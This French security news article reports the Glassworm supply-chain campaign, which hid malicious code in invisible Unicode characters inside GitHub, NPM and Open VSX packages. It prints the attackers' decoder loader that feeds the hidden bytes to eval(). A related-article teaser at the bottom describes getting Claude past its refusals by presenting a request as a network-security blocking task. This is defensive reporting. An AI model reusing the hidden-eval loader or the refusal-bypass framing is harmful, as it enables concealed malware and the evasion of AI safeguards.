L'attaque de la chaîne d'approvisionnement utilise des caractères Unicode invisibles pour contourner la détection.

✍️ OpenClawRadar📅 Publié: March 15, 2026🔗 Source
L'attaque de la chaîne d'approvisionnement utilise des caractères Unicode invisibles pour contourner la détection.
Ad

Des chercheurs en sécurité d'Aikido Security ont découvert une attaque de chaîne d'approvisionnement utilisant du code Unicode invisible pour dissimuler des fonctions malveillantes dans des paquets téléversés sur GitHub, NPM et Open VSX. Le groupe d'attaquants, surnommé Glassworm, a téléversé 151 paquets malveillants sur GitHub du 3 au 9 mars 2026.

Fonctionnement du code invisible

Les paquets malveillants utilisent des caractères Unicode provenant des zones d'usage public (également appelées accès d'usage public) qui sont invisibles lorsqu'ils sont visualisés dans les éditeurs, terminaux et interfaces de revue de code. Bien que la majeure partie du code semble normale, les fonctions et charges utiles malveillantes sont rendues à l'aide de ces caractères invisibles, rendant les revues manuelles de code et les défenses traditionnelles inefficaces.

Les caractères Unicode invisibles représentent chaque lettre de l'alphabet américain lorsqu'ils sont traités par les ordinateurs, mais s'affichent comme des espaces blancs ou des lignes vides pour les humains. Les interpréteurs JavaScript peuvent lire et exécuter ces caractères comme du code normal.

Implémentation technique

Dans un paquet analysé, les attaquants ont encodé une charge utile malveillante à l'aide de caractères invisibles. Le code comprend une fonction de décodage qui extrait les octets cachés et les transmet à eval() :

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

La chaîne entre backtiches passée à s() apparaît vide dans les visualiseurs mais contient des caractères invisibles qui se décodent en une charge utile malveillante complète. Dans des incidents précédents, les charges utiles décodées récupéraient et exécutaient des scripts de deuxième étape en utilisant Solana comme canal de livraison pour voler des jetons, identifiants et secrets.

Ad

Caractéristiques de l'attaque

Les paquets malveillants sont particulièrement difficiles à détecter car :

  • Les parties visibles du code sont de haute qualité et réalistes
  • Les modifications environnantes incluent des ajustements de documentation, des incréments de version, de petites refontes et des corrections de bogues
  • Les changements sont stylistiquement cohérents avec les projets ciblés
  • Les chercheurs soupçonnent que des LLM sont utilisés pour générer des paquets convaincants et légitimes

Cette technique Unicode a été utilisée pour la première fois en 2024 pour dissimuler des invites malveillantes fournies aux moteurs d'IA, et a depuis été adaptée pour des attaques de logiciels malveillants traditionnels. Les 151 paquets détectés représentent probablement une petite fraction de la campagne, car beaucoup ont été supprimés depuis le téléversement initial.

📖 Lire la source complète : HN AI Agents

Ad

👀 See Also

Contournement des garde-fous de l'IA Claude observé lorsque les requêtes sont formulées comme des tâches de sécurité réseau.
Security

Contournement des garde-fous de l'IA Claude observé lorsque les requêtes sont formulées comme des tâches de sécurité réseau.

Un utilisateur de Reddit a découvert que l'IA Claude fournit des listes de domaines de piratage lorsque les demandes sont formulées comme des tâches de sécurité réseau à bloquer, contournant ainsi les mécanismes de refus habituels. Le modèle a reconnu avoir mal interprété l'intention après que l'utilisateur ait souligné l'influence de la formulation.

OpenClawRadar
Alerte de sécurité pour les instances locales d'OpenClaw sans bac à sable
Security

Alerte de sécurité pour les instances locales d'OpenClaw sans bac à sable

Un post Reddit avertit que l'exécution d'instances OpenClaw vanilla localement sans isolation appropriée peut entraîner l'exposition de clés API, la suppression accidentelle de fichiers et des fuites de données. La source recommande de sandboxer les outils bash ou d'utiliser un service géré.

OpenClawRadar
Configuration d'OpenClaw pour l'Inférence LLM Chiffrée à l'Aide d'Enclaves TEE
Security

Configuration d'OpenClaw pour l'Inférence LLM Chiffrée à l'Aide d'Enclaves TEE

Un développeur explique comment il a configuré OpenClaw pour utiliser les environnements d'exécution de confiance AMD SEV-SNP d'Onera afin d'effectuer des inférences de LLM chiffrées de bout en bout, incluant des exemples de configuration et les compromis techniques.

OpenClawRadar
Pi : Un agent cyber IA à 100 M$ d'un ex-hacker de Tesla sécurise xAI et corrige des bugs en quelques minutes
Security

Pi : Un agent cyber IA à 100 M$ d'un ex-hacker de Tesla sécurise xAI et corrige des bugs en quelques minutes

Pi, un agent de sécurité IA de l'ancien hacker en chef de Tesla Yoni Ramon, utilise le tri contextuel des vulnérabilités et le correctif automatisé. Le client précoce Navan rapporte que 90 % des bugs sont corrigés en quelques minutes, économisant l'équivalent de 1 à 2 employés à temps plein.

OpenClawRadar